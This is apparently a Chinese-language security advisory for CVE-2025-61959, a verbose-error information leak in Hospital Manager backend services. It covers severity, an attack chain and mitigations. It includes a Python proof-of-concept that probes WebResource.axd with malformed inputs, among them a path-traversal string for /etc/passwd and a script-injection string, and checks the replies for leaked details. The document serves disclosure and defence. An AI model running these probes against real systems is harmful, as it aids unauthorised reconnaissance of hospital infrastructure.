CVE-2025-61959 Hospital Manager ASP.NET错误页面信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-61959

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Hospital Manager Backend Services

漏洞概述

CVE-2025-61959是影响Hospital Manager后端服务的一个信息泄露漏洞。在2025年9月19日之前，该系统对无效的WebResource.axd请求返回详细的ASP.NET错误页面，泄露了包括框架版本、ASP.NET版本信息、详细堆栈跟踪、内部文件路径以及不安全的配置设置'customErrors mode="Off"'等敏感信息。此漏洞允许未经身份验证的远程攻击者通过发送特制的请求获取系统内部信息，从而进行进一步的侦察活动。攻击者可利用这些泄露的信息了解目标系统的技术栈、版本号和目录结构，为后续攻击（如针对性漏洞利用、密码猜测或社会工程攻击）提供重要情报。由于该漏洞无需认证即可利用，且位于网络可访问位置，因此具有较高的可利用性。

技术细节

该漏洞源于Hospital Manager后端服务在处理WebResource.axd请求时的错误处理机制配置不当。当攻击者向服务器发送针对WebResource.axd的无效请求时，服务器会返回详细的ASP.NET错误页面，泄露以下敏感信息：1) ASP.NET框架版本和配置信息；2) 完整的异常堆栈跟踪，包含方法调用链和行号；3) 服务器内部文件路径和目录结构；4) 不安全的customErrors配置（mode="Off"）。攻击者可以通过构造恶意HTTP请求（如包含特殊字符、错误参数或不存在资源ID的请求）来触发错误页面。由于WebResource.axd是ASP.NET用于检索嵌入式资源的处理器，攻击者可以利用不同的变体请求来探测系统响应并收集情报。这些信息泄露使攻击者能够精确识别目标系统的技术栈版本，从而确定可能存在的其他已知漏洞进行组合攻击。

攻击链分析

STEP 1

步骤1：侦察和信息收集

攻击者通过发送特制的WebResource.axd请求探测目标服务器，无需任何认证即可触发详细的ASP.NET错误页面

STEP 2

步骤2：提取敏感信息

从错误页面响应中提取ASP.NET版本、框架配置、内部路径、堆栈跟踪等敏感信息

STEP 3

步骤3：版本识别和漏洞映射

利用泄露的版本信息识别目标系统可能存在的其他已知漏洞和配置弱点

STEP 4

步骤4：针对性攻击准备

根据收集的情报准备针对特定版本ASP.NET或相关组件的利用代码和攻击策略

STEP 5

步骤5：组合攻击执行

结合信息泄露漏洞和已识别的其他漏洞执行进一步的攻击，可能导致远程代码执行、数据泄露或服务中断

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-61959 PoC - Hospital Manager Information Disclosure
# Target: Hospital Manager Backend Services
# Vulnerability: Verbose ASP.NET error pages leak sensitive information

def exploit_cve_2025_61959(target_url):
    """
    Exploit for CVE-2025-61959
    Sends malformed WebResource.axd requests to trigger detailed error pages
    """
    
    # List of malicious WebResource.axd requests
    payloads = [
        "/WebResource.axd?d=invalid_id",
        "/WebResource.axd?d=<script>alert(1)</script>",
        "/WebResource.axd?d=../../../etc/passwd",
        "/WebResource.axd?t=invalid_type",
        "/WebResource.axd",
        "/WebResource.axd?d=test&t=1234567890"
    ]
    
    print(f"[*] Testing target: {target_url}")
    print(f"[*] CVE-2025-61959 - Hospital Manager Information Disclosure\n")
    
    for payload in payloads:
        try:
            url = target_url.rstrip('/') + payload
            print(f"[+] Sending request: {payload}")
            
            response = requests.get(url, timeout=10, verify=False)
            
            # Check for information disclosure indicators
            indicators = [
                "ASP.NET",
                "Stack Trace",
                "System.Web",
                "customErrors",
                "mode=\"Off\"",
                "at ",
                ".cs:line",
                "Server Error",
                "Configuration Error"
            ]
            
            response_text = response.text
            found_indicators = []
            
            for indicator in indicators:
                if indicator in response_text:
                    found_indicators.append(indicator)
            
            if found_indicators:
                print(f"    [!] VULNERABLE! Found indicators: {', '.join(found_indicators)}")
                print(f"    [i] Status code: {response.status_code}")
                print(f"    [i] Response length: {len(response_text)} bytes\n")
                return True
            else:
                print(f"    [-] No information disclosure detected\n")
                
        except requests.exceptions.RequestException as e:
            print(f"    [!] Error: {e}\n")
    
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit_cve_2025_61959(target)

影响范围

Hospital Manager Backend Services < 2025-09-19修复版本

防御指南

临时缓解措施

作为紧急缓解措施，应立即修改web.config文件，将<customErrors>标签的mode属性从"Off"更改为"RemoteOnly"或"On"，并确保所有生产环境的ASP.NET应用程序启用自定义错误页面。同时，建议在Web服务器前部署WAF规则来过滤包含路径遍历、特殊字符或异常参数的WebResource.axd请求，防止攻击者通过发送恶意请求触发详细错误页面。